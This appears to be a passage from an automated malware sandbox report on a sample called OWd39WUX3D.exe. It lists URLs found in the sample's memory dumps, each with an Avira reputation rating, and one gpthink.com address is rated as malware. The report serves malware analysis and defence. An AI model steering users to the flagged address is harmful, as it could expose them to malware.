00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://www.pcgrate.com/wp-content/uploads/the7-css/post-type-dynamic.css?ver=c08792de11d2OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri-z-izhodnim-signalom/OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/prikazovalnik-toka-jola/OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/meritevOWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.jsOWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://gpthink.com/product/204.htmlOWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  https://www.com-sit.com/kontakt-comsit-distribution-gmbh/OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/pretvorniki-tlaka-wika/OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://www.com-sit.com/wp-content/uploads/premium-addons-elementor/pa-frontend-2947ecb72.min.css?verOWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/prikazovalniki-temperature/OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://pohlfood.com/wp-content/uploads/elementor/css/post-330.css?ver=1694553266OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/jquery.qtip.min.OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://www.pwd.org/OWd39WUX3D.exe, 00000000.00000003.482754637.0000000006B8B000.00000004.00000020.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557996648.0000000003B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?verOWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://net3.necs.com/pohlfood/site/search?selectview=byclass&amp;queryCol=&amp;terms=pizzaOWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        high
